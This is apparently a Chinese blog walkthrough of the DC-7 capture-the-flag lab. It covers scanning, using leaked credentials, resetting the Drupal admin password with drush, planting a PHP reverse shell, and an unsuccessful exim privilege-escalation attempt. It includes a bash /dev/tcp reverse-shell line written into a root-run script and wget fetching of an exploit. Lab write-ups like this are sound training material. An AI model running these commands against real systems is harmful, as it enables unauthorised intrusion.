DC7靶机训练

kali:192.168.78.131
DC-7:192.168.78.142

扫描存活主机和开放端口

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.142

DC7靶机训练_第1张图片

访问80端口

DC7靶机训练_第2张图片

又是这个框架,这个系列遇到很多次了
其实再前面我们使用NMAP命令的时候已经对80端口做了域名扫描,这里就不再使用dirseach扫描

DC7靶机训练_第3张图片
看到/user/login,访问一下:
DC7靶机训练_第4张图片

不行没办法,整个框架被修改过业务,并没有存在像DC8一样的sql注入
回过头再来看看提示:



DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box.  :-)

译文:

DC-7引入了一些“新”概念,但我将留给您去弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。

你必须做的是跳出框框思考。

“在”盒子外面。:-)

很明显告诉我们了这个是被修改过的,很难受。

DC7靶机训练_第5张图片

百度一下?@DC7USER

DC7靶机训练_第6张图片
目测是框架源码?
DC7靶机训练_第7张图片目测是需要我代码审计?当场愣住
最后在config.php中发现账户和密码

DC7靶机训练_第8张图片

尝试半天登录不了

DC7靶机训练_第9张图片
使用SSH登录试试

DC7靶机训练_第10张图片

find / -perm -u=s -type f 2>/dev/null

DC7靶机训练_第11张图片
发现可疑的exim4

在这里插入图片描述

奇了怪了 ,这里居然不能查询,很是诧异
回到当前目录下,发现新的提示:

DC7靶机训练_第12张图片

查看一下mail

DC7靶机训练_第13张图片
发现database存储的位置,还是刚才的backups目录,
直接查看会乱码

DC7靶机训练_第14张图片
有点尴尬 一时间不知道怎么办,再去看看那个mail

DC7靶机训练_第15张图片

查看backups.sh权限

在这里插入图片描述
发现一个写入权限
补充知识点,ls-al 的命令列内容依次是:

DC7靶机训练_第16张图片

没有权限啊这里

再看一下backups.sh的内容:

DC7靶机训练_第17张图片
发现使用了drush

DC7靶机训练_第18张图片

修改密码:

drush user-password admin --password="123456"

登录admin,登录成功之后可以像DC8一样添加PHP代码反弹shell,但是这里缺少PHP,所以需要自己先下载
DC7靶机训练_第19张图片

添加url后下载成功,勾选PHP
DC7靶机训练_第20张图片
即可添加成功,然后再页面里面编辑,直接反弹shell

DC7靶机训练_第21张图片
写shell
DC7靶机训练_第22张图片

发现写不进去,然后跟着其他作者WP知道了原因

I’d gone through this exercise a couple of times and it seemed that on the first instance of selecting preview, I did not get PHP to render. Perhaps we need to change the Text format in advance of entering PHP or maybe it’s just this particular install being buggy. Just pointing that out in case it doesn’t work the first time around.


我已经做了几次这个练习,似乎在选择preview的第一个实例中,我没有让PHP进行渲染。也许我们需要在进入PHP之前更改文本格式,或者可能只是这个特定的安装有问题。如果第一次不起作用,就指出这一点。


解决方案:不在basic page里面插入php代码,在其他页面插入就好了

这里我选择了一个404页面


DC7靶机训练_第23张图片
成功反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

DC7靶机训练_第24张图片
www-data权限,需要进行提权

find / -perm -u=s -type f 2>/dev/null

DC7靶机训练_第25张图片
发现exim的SUID权限,类似昨天打的DC-8系列,还是接着走一遍提权过程

exim --version 

DC7靶机训练_第26张图片

searchsploit exim

DC7靶机训练_第27张图片
发现合适的版本,将脚本复制到本地,然后转换成unix格式(linux脚本在windows下有时不可用)

第一个方法:在命令模式下:
	:set ff =unix
第二个方法:将格式直接转换成unix格式
	dos2unix 46996.sh #将文件转换成unix格式

接下来下载sh脚本即可,最简单的开放一个端口 wget下载

python -m SimpleHTTPServer 8000
wget http://192.168.78.131:8000/46996.sh

加权限,运行脚本

chmod +x 46996.sh
./46996.sh -m netcat

DC7靶机训练_第28张图片

emmm,一顿操作猛如虎,结果不能提权,出错了,欸
去查看sh的权限

在这里插入图片描述

权限拉满

root表示文件拥有者
www-data表示文件所在组的权限#当前就是www用户,所以操作拉满
最后一个表示其他用户的权限

补充一个小知识:
 groups xxx(用户名称) 可以查看自己所在组成员用户

我这里VI编辑的话,会出现以下问题:
DC7靶机训练_第29张图片
所以换个方法写入到脚本里面

echo "bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 "

写入并成功查看页面

DC7靶机训练_第30张图片
EMM ,查看了下定时任务,发现并没有这个定时任务啊,惊了

ls -l /etc/cron*

DC7靶机训练_第31张图片
提权失败,emm。希望懂的师傅指出

你可能感兴趣的:(内网安全,安全)